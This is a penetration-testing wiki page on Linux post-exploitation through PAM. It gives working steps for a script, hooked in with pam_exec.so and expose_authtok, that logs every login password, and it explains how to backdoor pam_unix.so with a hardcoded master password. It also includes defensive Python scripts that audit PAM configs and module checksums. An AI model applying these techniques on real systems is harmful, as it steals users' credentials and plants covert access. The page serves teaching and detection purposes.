# Linux Post-Exploitation

<details>

<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Sniffing Logon Passwords with PAM

Let's configure a PAM module that logs the password each user types at login. If you don't know what PAM is, check:

{% content-ref url="/pages/e1BTDdVfds6hYR8I2DKD" %}
[PAM - Pluggable Authentication Modules](/dashboard/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md)
{% endcontent-ref %}

First, we create a bash script that will be invoked whenever a new authentication occurs.

```bash
#!/bin/sh
# Invoked by pam_exec.so: PAM_USER and PAM_RHOST arrive in the environment and,
# because of the expose_authtok option, the password arrives on stdin.
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
```

The variables are PAM specific and will become available via the `pam_exec.so` module.

Here is the meaning of the variables:

* **$PAM\_USER:** The username that was entered.
* **$PAM\_RHOST:** The remote host (typically the IP address).
* **$(cat -):** This reads `stdin`, which carries the password the script grabs.
* The results are appended to a log file at `/var/log/toomanysecrets.log`.

To **prevent other users from reading** the log file, pre-create it and restrict its permissions with `chmod`, e.g.:

```bash
# Pre-create the log file the script appends to and keep it out of reach of other users
sudo touch /var/log/toomanysecrets.log
sudo chmod 770 /var/log/toomanysecrets.log
```

Next, the PAM configuration needs to be updated so that the `pam_exec` module invokes the script.

There are various config files located in `/etc/pam.d/`, and we pick `common-auth`.

```bash
sudo nano /etc/pam.d/common-auth
```

On the very bottom of the file, add the following authentication module:

`auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh`

The options have the following meaning:

* **optional:** Authentication shouldn't fail if there is an error (it's not a required step)
* **pam\_exec.so:** This is the living-off-the-land PAM module that can invoke arbitrary scripts
* **expose\_authtok:** This is the trick that lets the script read the password via `stdin`
* **quiet:** Don't show any errors to the user (if something doesn't work)
* The last argument is the shell script that was created previously

![](https://github.com/nirugima/hacktricks/blob/main/.gitbook/assets/image%20\(375\).png)

Finally, make the file executable:

`sudo chmod 700 /usr/local/bin/toomanysecrets.sh`

Now, let's try this out: ssh from another machine, or log in locally, and then look at the log file:

```
$ sudo cat /var/log/toomanysecrets.log
 Sun Jun 26 23:36:37 PDT 2022 tom, Trustno1!, From: 192.168.1.149
 Sun Jun 26 23:37:53 PDT 2022 tom, Trustno1!, From:
 Sun Jun 26 23:39:12 PDT 2022 tom, Trustno1!, From: 192.168.1.149
```
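From the defender's side, the configuration change above is exactly what an audit of `/etc/pam.d/` should flag: a `pam_exec.so` line carrying `expose_authtok`. The following Python script is an added example (not code from this page or from the referenced post) that parses PAM lines, including bracketed control fields such as `[success=1 default=ignore]`, and reports every `pam_exec.so` hook, rating those with `expose_authtok` as high severity. The sample configuration strings are constructed, and `/usr/local/sbin/login-notify.sh` is a hypothetical path.

```python
"""Audit PAM configuration for pam_exec.so entries that can see the
plaintext password (expose_authtok).  Added example, not part of the
original page; it only parses files and changes nothing."""
import os
import re
from pathlib import Path
from typing import List, NamedTuple, Optional


class PamEntry(NamedTuple):
    source: str
    lineno: int
    service_type: str   # auth, account, password, session
    control: str        # required, optional, [success=1 default=ignore], ...
    module: str         # basename of the module, e.g. pam_exec.so
    args: List[str]


_BRACKET_CONTROL = re.compile(r"^\[(.*?)\]\s*(.*)$")


def parse_pam_line(line: str, source: str = "<inline>", lineno: int = 0) -> Optional[PamEntry]:
    """Parse one /etc/pam.d line; return None for blanks, comments and @include."""
    stripped = line.split("#", 1)[0].strip()
    if not stripped or stripped.startswith("@include"):
        return None
    parts = stripped.split(None, 1)
    if len(parts) < 2:
        return None
    service_type = parts[0].lstrip("-")   # a leading '-' only silences module-load errors
    rest = parts[1]
    m = _BRACKET_CONTROL.match(rest)
    if m:                                  # bracketed control field with spaces inside
        control, rest = "[" + m.group(1) + "]", m.group(2)
    else:
        ctl = rest.split(None, 1)
        control, rest = ctl[0], (ctl[1] if len(ctl) > 1 else "")
    tokens = rest.split()
    if not tokens:
        return None
    return PamEntry(source, lineno, service_type, control,
                    os.path.basename(tokens[0]), tokens[1:])


def audit_pam_text(text: str, source: str = "<inline>") -> List[dict]:
    """Return a finding per pam_exec.so entry; expose_authtok makes it high severity."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = parse_pam_line(line, source, lineno)
        if entry is None or entry.module != "pam_exec.so":
            continue
        exposes = "expose_authtok" in entry.args
        script = next((a for a in entry.args if a.startswith("/")), "<no path>")
        findings.append({
            "source": source,
            "line": lineno,
            "type": entry.service_type,
            "control": entry.control,
            "script": script,
            "severity": "high" if exposes else "info",
            "reason": ("script receives the plaintext password on stdin" if exposes
                       else "pam_exec.so hook; confirm the script is expected"),
        })
    return findings


def audit_pam_dir(directory: str = "/etc/pam.d") -> List[dict]:
    """Run audit_pam_text over every file in a PAM configuration directory."""
    findings = []
    for path in sorted(Path(directory).iterdir()):
        if path.is_file():
            findings.extend(audit_pam_text(path.read_text(errors="replace"), str(path)))
    return findings


# Constructed sample of a common-auth file; the last line is the hook described above.
SAMPLE_COMMON_AUTH = """\
# /etc/pam.d/common-auth (constructed sample)
auth    [success=1 default=ignore]      pam_unix.so nullok
auth    requisite                       pam_deny.so
auth    required                        pam_permit.so
auth    optional                        pam_cap.so
auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh
"""

# Constructed sample with a pam_exec.so hook that does NOT see the password.
SAMPLE_SSHD = """\
# /etc/pam.d/sshd (constructed sample; the notify script path is hypothetical)
@include common-auth
session optional pam_exec.so seteuid /usr/local/sbin/login-notify.sh
"""

if __name__ == "__main__":
    for f in audit_pam_text(SAMPLE_COMMON_AUTH, "common-auth") + audit_pam_text(SAMPLE_SSHD, "sshd"):
        print(f"[{f['severity']}] {f['source']}:{f['line']} {f['type']} {f['control']} "
              f"-> {f['script']} ({f['reason']})")
```

On a live host call `audit_pam_dir()` (the default directory is `/etc/pam.d`) and treat every `high` finding as an incident, since no legitimate `pam_exec.so` hook needs the token; `info` findings are common (session notifications, home-directory setup) and only need the script path compared against what the package or configuration management deployed.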

### Backdooring PAM

Let's go to the PAM sources (the exact lines depend on your distro, so take the same version it ships) and look around lines 170/180 of the `pam_unix_auth.c` file:

```bash
vi modules/pam_unix/pam_unix_auth.c
```

![](https://github.com/nirugima/hacktricks/blob/main/.gitbook/assets/image%20\(651\).png)

Let's change it to:

![](https://github.com/nirugima/hacktricks/blob/main/.gitbook/assets/image%20\(638\)%20\(2\)%20\(2\).png)

This will allow any user using the **password "0xMitsurugi"** to log in.

Recompile `pam_unix_auth.c` and replace the `pam_unix.so` file (the source path shown is the author's build directory; the destination is the PAM module directory of a 64-bit Debian/Ubuntu system):

```bash
make
sudo cp \
  /home/mitsurugi/PAM/pam_deb/pam-1.1.8/modules/pam_unix/.libs/pam_unix.so \
  /lib/x86_64-linux-gnu/security/
```

{% hint style="info" %}
You can automate this process with <https://github.com/zephrax/linux-pam-backdoor>
{% endhint %}
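A rebuilt `pam_unix.so` no longer matches the checksum its package recorded at install time, which is the quickest way for a defender to notice this kind of replacement. The script below is an added example, not code from this page or from the linked repositories; it assumes Debian's dpkg layout, where `/var/lib/dpkg/info/<package>.md5sums` lists one `<md5>  <path relative to />` line per file (for the PAM modules that package is `libpam-modules`), and it builds a throwaway directory tree with constructed file contents to demonstrate the detection offline.

```python
"""Compare installed PAM modules against the checksums the package manager
recorded at install time.  Added example, not part of the original page;
it assumes Debian's dpkg layout, where /var/lib/dpkg/info/<pkg>.md5sums
holds one '<md5hex>  <path relative to />' line per file."""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, Iterator, Tuple


def md5_of_file(path: Path) -> str:
    """Hash a file in chunks; md5 is used only because that is what dpkg records."""
    h = hashlib.md5()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_md5sums(text: str) -> Iterator[Tuple[str, str]]:
    """Yield (expected_md5, relative_path) pairs from a dpkg .md5sums file."""
    for line in text.splitlines():
        if not line.strip():
            continue
        digest, relpath = line.split("  ", 1)   # dpkg separates the fields with two spaces
        yield digest.strip(), relpath.strip()


def verify_files(md5sums_text: str, root: str = "/", only_under: str = "lib") -> Dict[str, str]:
    """Map each recorded path (under only_under) to 'ok', 'MODIFIED' or 'MISSING'."""
    results: Dict[str, str] = {}
    for expected, relpath in parse_md5sums(md5sums_text):
        if only_under and not relpath.startswith(only_under):
            continue
        full = Path(root) / relpath
        if not full.is_file():
            results[relpath] = "MISSING"
        elif md5_of_file(full) != expected:
            results[relpath] = "MODIFIED"
        else:
            results[relpath] = "ok"
    return results


def demo() -> Dict[str, str]:
    """Constructed scenario: a throwaway tree in which pam_unix.so has been swapped."""
    root = Path(tempfile.mkdtemp())
    secdir = root / "lib/x86_64-linux-gnu/security"
    secdir.mkdir(parents=True)
    # Constructed stand-ins for the module bytes the package shipped.
    shipped = {"pam_unix.so": b"shipped pam_unix bytes", "pam_exec.so": b"shipped pam_exec bytes"}
    for name, data in shipped.items():
        (secdir / name).write_bytes(data)
    # What dpkg would have written to the package's .md5sums at install time.
    md5sums = "".join(f"{hashlib.md5(data).hexdigest()}  lib/x86_64-linux-gnu/security/{name}\n"
                      for name, data in shipped.items())
    # Simulate the module being replaced by a locally rebuilt copy.
    (secdir / "pam_unix.so").write_bytes(b"locally rebuilt pam_unix bytes")
    return verify_files(md5sums, root=str(root))


if __name__ == "__main__":
    for path, status in demo().items():
        print(f"{status:9} {path}")
```

On a real Debian host feed it the actual record, e.g. `verify_files(Path("/var/lib/dpkg/info/libpam-modules:amd64.md5sums").read_text())`; `debsums -c libpam-modules` and, on RPM systems, `rpm -V pam` perform the same comparison. Root can rewrite the `.md5sums` file as easily as the module, so a baseline kept off the host (an AIDE database, or checksums taken from a freshly downloaded copy of the package) is the stronger reference.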

## References

* <https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/>
* <https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9>
